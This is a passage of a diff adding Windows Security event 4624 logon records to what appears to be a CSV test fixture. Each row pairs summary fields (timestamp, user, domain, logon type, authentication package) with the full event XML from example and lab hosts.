+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1002</Data>
+    <Data Name=""TargetUserName"">sshd_server</Data>
+    <Data Name=""TargetDomainName"">PC02</Data>
+    <Data Name=""TargetLogonId"">0xe509</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">PC02</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:08.689762+04:00,1550070908.689762,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:08.216083Z"">
+    </TimeCreated>
+    <EventRecordID>5296</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:07.852561+04:00,1550070907.852561,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:07.422945Z"">
+    </TimeCreated>
+    <EventRecordID>5293</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:07.422945+04:00,1550070907.422945,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:05.924796Z"">
+    </TimeCreated>
+    <EventRecordID>5291</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:05.924796+04:00,1550070905.924796,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:05.660417Z"">
+    </TimeCreated>
+    <EventRecordID>5289</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:05.660417+04:00,1550070905.660417,4624,LOCAL SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:05.065564Z"">
+    </TimeCreated>
+    <EventRecordID>5287</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:05.065564+04:00,1550070905.065564,4624,NETWORK SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:04.911343Z"">
+    </TimeCreated>
+    <EventRecordID>5285</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-20</Data>
+    <Data Name=""TargetUserName"">NETWORK SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e4</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:04.911343+04:00,1550070904.911343,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:04.635947Z"">
+    </TimeCreated>
+    <EventRecordID>5283</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:04.635947+04:00,1550070904.635947,4624,SYSTEM,NT AUTHORITY,0,-,-,-,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:04.175284Z"">
+    </TimeCreated>
+    <EventRecordID>5281</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""484"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">0</Data>
+    <Data Name=""LogonProcessName"">-</Data>
+    <Data Name=""AuthenticationPackageName"">-</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x4</Data>
+    <Data Name=""ProcessName""></Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:04.135227+04:00,1550070904.135227,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:14:52.409734Z"">
+    </TimeCreated>
+    <EventRecordID>5278</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""1716"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-04-25T22:17:47.058172Z"">
+    </TimeCreated>
+    <EventRecordID>72742</EventRecordID>
+    <Correlation ActivityID=""6C67E3EE-58ED-0002-0DE4-676CED58D801"">
+    </Correlation>
+    <Execution ProcessID=""680"" ThreadID=""768"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>02694w-win10.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x8a38de</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">35D5E180-95BD-9ED7-7EFE-C355D7215A87</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50163</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-03-19T03:23:57.397648+04:00,1552951437.397648,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T23:23:57.397648Z"">
+    </TimeCreated>
+    <EventRecordID>565611</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""3116"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x15e25f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">1054A084-EFFD-F992-9C74-63873C88272E</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">fe80::79bf:8ee2:433c:2567</Data>
+    <Data Name=""IpPort"">55873</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+  </EventData>
+</Event>"
+2019-03-19T03:23:52.507387+04:00,1552951432.507387,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T23:23:52.491923Z"">
+    </TimeCreated>
+    <EventRecordID>565599</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""1208"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""TargetUserName"">user01</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x15e1a7</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">14CCCD18-A781-AC28-C773-EA57D49F4B90</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49222</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+  </EventData>
+</Event>"
+2019-03-19T03:23:51.772355+04:00,1552951431.772355,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T23:23:43.570212Z"">
+    </TimeCreated>
+    <EventRecordID>565596</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x15e162</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">fe80::79bf:8ee2:433c:2567</Data>
+    <Data Name=""IpPort"">55872</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
